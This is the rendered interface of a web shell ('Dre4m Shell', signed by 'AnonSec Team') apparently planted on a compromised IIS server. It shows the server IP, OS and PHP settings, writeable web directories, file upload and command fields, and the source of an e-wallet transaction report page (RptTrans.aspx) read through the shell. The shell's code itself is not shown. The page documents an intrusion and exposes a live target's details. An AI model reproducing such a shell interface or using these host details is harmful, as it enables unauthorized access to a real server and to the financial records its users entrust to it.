Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 3.138.36.168
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/tradepan/blc.trade-panel.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Domains/tradepan/blc.trade-panel.com/wwwroot/RptTrans.aspx
<%@ page language="C#" autoeventwireup="true" inherits="RptTrans, App_Web_zq2z_uvg" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>Member | XNY</title>

    <LINK href="css/dash2016.css" rel="stylesheet" type="text/css"> 
     
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/font-awesome.min.css" rel="stylesheet">
    <link href="css/prettyPhoto.css" rel="stylesheet">
    <link href="css/price-range.css" rel="stylesheet">
    <link href="css/animate.css" rel="stylesheet">
	<link href="css/main.css" rel="stylesheet">
	<link href="css/responsive.css" rel="stylesheet">
    <!--[if lt IE 9]>
    <script src="js/html5shiv.js"></script>
    <script src="js/respond.min.js"></script>
    <![endif]-->       
    <link rel="shortcut icon" href="images/ico/favicon.ico">
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="images/ico/apple-touch-icon-144-precomposed.png">
    <link rel="apple-touch-icon-precomposed" sizes="114x114" href="images/ico/apple-touch-icon-114-precomposed.png">
    <link rel="apple-touch-icon-precomposed" sizes="72x72" href="images/ico/apple-touch-icon-72-precomposed.png">
    <link rel="apple-touch-icon-precomposed" href="images/ico/apple-touch-icon-57-precomposed.png">
</head>
<body>
    <form id="form1" runat="server">
    <div>


                    <asp:ObjectDataSource ID="ObjectDataSource1" runat="server"   TypeName="eWalletDB" OldValuesParameterFormatString="original_{0}" SelectMethod="GetInfo" DataObjectTypeName="eWallet" />
 				        <asp:GridView ID="gvPay" runat="server"  TypeName="eWalletDB"  HorizontalAlign ="Center" Width ="96%" DataSourceID="ObjectDataSource1"  DataKeyNames ="eWalletid" AutoGenerateColumns ="false" PageSize="40" AllowPaging="True" ShowFooter="false" PagerSettings-Visible="false" OnSelectedIndexChanged="gvPay_SelectedIndexChanged" OnPageIndexChanging="gvPay_PageIndexChanging" class="cart_menu" >
 				        
                      
                            <Columns>
                                                                                        
                                <asp:BoundField DataField="eWalletID" HeaderText="ID">
                                    <HeaderStyle HorizontalAlign="Left" ForeColor="Orange" BackColor="Red" Font-Size="Larger"    />
                                    <ItemStyle HorizontalAlign="Left" Width="60px" />
                                </asp:BoundField>
 
                               <asp:TemplateField  HeaderText="Date">                                
                                <HeaderStyle HorizontalAlign ="Left" ForeColor="Orange" BackColor="Red" Font-Size="Larger"   />
                                <ItemStyle HorizontalAlign ="Left"  />
                                <ItemTemplate>
                                <%#Convert.ToDateTime(DataBinder.Eval(Container.DataItem, "TrDate").ToString()).ToString("dd-MMM-yyyy HH:mm:ss")%>
                                </ItemTemplate>
                                </asp:TemplateField>                                
                                <asp:TemplateField  HeaderText="Credit In">
                                    <HeaderStyle HorizontalAlign="Right" />
                                    <ItemStyle HorizontalAlign="Right"   />
                                    <ItemTemplate>                                    
                                    <%#Convert.ToDouble  (DataBinder.Eval(Container.DataItem, "RemitAmt").ToString()).ToString ("0.00")%>
                                    </ItemTemplate>
                                </asp:TemplateField> 
                                <asp:TemplateField  HeaderText="Transfer Out">
                                    <HeaderStyle HorizontalAlign="Right" />
                                    <ItemStyle HorizontalAlign="Right"   />
                                    <ItemTemplate>                                    
                                    <%#Convert.ToDouble(DataBinder.Eval(Container.DataItem, "TrfOut").ToString()).ToString("0.00")%>
                                    </ItemTemplate>
                                </asp:TemplateField>                                                                 
                                <asp:BoundField DataField="MemberCode" HeaderText="Receiver" >
                                    <HeaderStyle HorizontalAlign="Left" />
                                    <ItemStyle HorizontalAlign="Left" />
                                </asp:BoundField>                             
                                <asp:BoundField DataField="FromTo" HeaderText="Person Name" >
                                    <HeaderStyle HorizontalAlign="Left" />
                                    <ItemStyle HorizontalAlign="Left" />
                                </asp:BoundField>  

                                <asp:BoundField DataField="FromCode" HeaderText="From" >
                                    <HeaderStyle HorizontalAlign="Left" />
                                    <ItemStyle HorizontalAlign="Left" />
                                </asp:BoundField> 
                                                                  
                                <asp:BoundField DataField="FromMember" HeaderText="From Name" Visible = "false">
                                    <HeaderStyle HorizontalAlign="Left" />
                                    <ItemStyle HorizontalAlign="Left" />
                                </asp:BoundField>         
 
                        
                                                                                                                                                                                                                
                                
                                <asp:BoundField DataField="TakeNote" HeaderText="Remark" >
                                    <HeaderStyle HorizontalAlign="Left" />
                                    <ItemStyle HorizontalAlign="Left" />
                                </asp:BoundField>                                                                
                                                               
                                <asp:BoundField DataField="BalNote" HeaderText="Bank" >
                                    <HeaderStyle HorizontalAlign="Center" />
                                    <ItemStyle HorizontalAlign="Center" />
                                </asp:BoundField>                                   
                            </Columns>
                          <HeaderStyle HorizontalAlign="Center" BackColor="#4E4EFF" CssClass="xheader" Height="40px" Font-Size="Medium"  Font-Bold="true"      />
                          <AlternatingRowStyle BackColor="#6C6C6C" />
                        </asp:GridView>


    
    </div>
    </form>
</body>
</html>

Anon7 - 2022
AnonSec Team